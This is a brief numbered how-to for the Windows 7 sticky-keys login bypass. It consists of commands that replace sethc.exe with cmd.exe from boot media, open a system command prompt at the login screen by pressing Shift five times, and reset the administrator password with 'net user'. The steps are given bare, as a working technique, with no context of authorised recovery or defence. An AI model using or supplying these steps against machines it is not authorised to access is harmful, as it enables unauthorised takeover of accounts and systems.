  1. Boot from Windows 7 Disk
  2. Command Prompt –
    copy c:\windows\system32\sethc.exe c:\
    copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
  3. Activate Sticky keys by SHIFT 5 times
    In Command Prompt Enter: net user administrator NewPassword
